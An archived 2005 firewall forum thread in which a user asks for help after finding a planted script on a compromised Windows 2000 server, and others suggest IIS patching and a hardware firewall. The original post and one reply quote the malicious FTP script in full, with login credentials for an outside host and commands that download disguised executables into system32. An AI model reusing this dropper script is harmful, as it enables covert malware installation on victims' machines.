Security Breach

Security Breach

Secure Home | Search | About
 Networking Firewalls    Post an article   get this group's latest topics as an RSS feed add this group's latest topics to your My MSN content add this group's latest topics to your My Yahoo content add this group's latest topics to your Google content
Subject Author Date
Security Breach quest 06-28-2005
Posted by quest on June 28, 2005, 7:06 pm
If you were  Registered and logged in, you could reply and use other advanced thread options
I am running windows 2k adv server, running iis , cold fusion, sql
server 2k, zone alarm file, netopia cayman 5300 series router and
remote admin. I just noticed a file C:\MSSQL_Script.txt which is
requesting ftp access to download some malicious file.. My Questions

I rebuilt my PC from a backup but the file just re-appeared again.
1) Does any know how they might have gotten in. i only have port
80,443,20,21 opened
2) how do hacker schedule jobs. Cos i didn notice a recp.exe program
requesting access also.
3) Can some help with the next steps i need to take.

Thanks

content of file

open ftp.cybton.com
USER mkeoma uvrlSN
USER mkeoma uvrlSN
binary
get /mowl/MSIntskmngr.exe C:\winnt\system32\driver\MSIntskmngr.exe
get /mowl/mspaintfixd.tmp C:\winnt\system32\driver\mspaintfixd.tmp
get /mowl/net.exe C:\winnt\system32\driver\net.exe
get /mowl/notepadc.xcl C:\winnt\system32\driver\notepadc.xcl
quit
open ftp.cybton.com
USER eazy VEDgFT
binary
get /mowl/MSIntskmngr.exe C:\winnt\system32\driver\MSIntskmngr.exe
get /mowl/mspaintfixd.tmp C:\winnt\system32\driver\mspaintfixd.tmp
get /mowl/net.exe C:\winnt\system32\driver\net.exe
get /mowl/notepadc.xcl C:\winnt\system32\driver\notepadc.xcl
quit



Posted by Mark on June 29, 2005, 10:49 pm
If you were  Registered and logged in, you could reply and use other advanced thread options
> I am running windows 2k adv server, running iis , cold fusion, sql
> server 2k, zone alarm file, netopia cayman 5300 series router and
> remote admin. I just noticed a file C:\MSSQL_Script.txt which is
> requesting ftp access to download some malicious file.. My Questions
>
> I rebuilt my PC from a backup but the file just re-appeared again.
> 1) Does any know how they might have gotten in. i only have port
> 80,443,20,21 opened
> 2) how do hacker schedule jobs. Cos i didn notice a recp.exe program
> requesting access also.
> 3) Can some help with the next steps i need to take.
>
> Thanks
>
> content of file
>
> open ftp.cybton.com
> USER mkeoma uvrlSN
> USER mkeoma uvrlSN
> binary
> get /mowl/MSIntskmngr.exe C:\winnt\system32\driver\MSIntskmngr.exe
> get /mowl/mspaintfixd.tmp C:\winnt\system32\driver\mspaintfixd.tmp
> get /mowl/net.exe C:\winnt\system32\driver\net.exe
> get /mowl/notepadc.xcl C:\winnt\system32\driver\notepadc.xcl
> quit
> open ftp.cybton.com
> USER eazy VEDgFT
> binary
> get /mowl/MSIntskmngr.exe C:\winnt\system32\driver\MSIntskmngr.exe
> get /mowl/mspaintfixd.tmp C:\winnt\system32\driver\mspaintfixd.tmp
> get /mowl/net.exe C:\winnt\system32\driver\net.exe
> get /mowl/notepadc.xcl C:\winnt\system32\driver\notepadc.xcl
> quit
>

I couldn't see exact specifications, but that router doesn't look to be much
of a firewall, probably only SPI, and Zone Alarm is a software based SPI
firewall with its own limitations. So you need to make sure either all
applications facing the internet (ie those on ports 80, 443, 20, and 21) are
fully patched, or need to look at a firewall with Intrusion Detection
capabilities (ie Netscreen/Sonicwall/Fortinet).




Posted by Spack on June 30, 2005, 9:30 am
If you were  Registered and logged in, you could reply and use other advanced thread options
quest wrote on 28 Jun 2005 19:06:59 -0700:

> I am running windows 2k adv server, running iis , cold fusion, sql
> server 2k, zone alarm file, netopia cayman 5300 series router and
> remote admin. I just noticed a file C:\MSSQL_Script.txt which is
> requesting ftp access to download some malicious file.. My Questions
>
> I rebuilt my PC from a backup but the file just re-appeared again.
> 1) Does any know how they might have gotten in. i only have port
> 80,443,20,21 opened

Best guess, IIS. Have you got it fully patched? Are you running any of the
add-on tools like URLScan or IISLockDown? I assume that you're using the IIS
FTP service too, that's a possible injection point and personally I wouldn't
run that software on my system.

And why oh why are you running ZoneAlarm on what is obviously a public
server. If you got enough cash to run 2K Advanced Server on it, surely you
can shell out for a decent hardware firewall.

Dan




Similar ThreadsPosted
XP SP2 Firewall security breach November 11, 2004, 7:49 pm
New site dedicated to security conferences : www.security-briefings.com May 6, 2006, 11:17 am
Security programs 2005 - , Firewall programs 2005 -, Antivirus programs 2005 -, APPDEV DOT NET SECURITY, Linux Security and Firewall programs 2005 -, CiscoWorks ( CW ) Security programs 2005 - , February 25, 2005, 5:03 am
Home Security eBook - Home Security - How to Protect Your Family and Your Property - Home_Security.exe (0/2) November 5, 2004, 5:25 pm
Security June 6, 2005, 11:23 am
BGP Security October 4, 2005, 2:27 am
Network security December 10, 2004, 5:09 am
Security Software May 15, 2005, 3:41 pm
Network Security Job July 8, 2005, 11:26 pm
Possible security problem? July 28, 2005, 12:16 am

The site map in XML format XML site map

Contact Us | Privacy Policy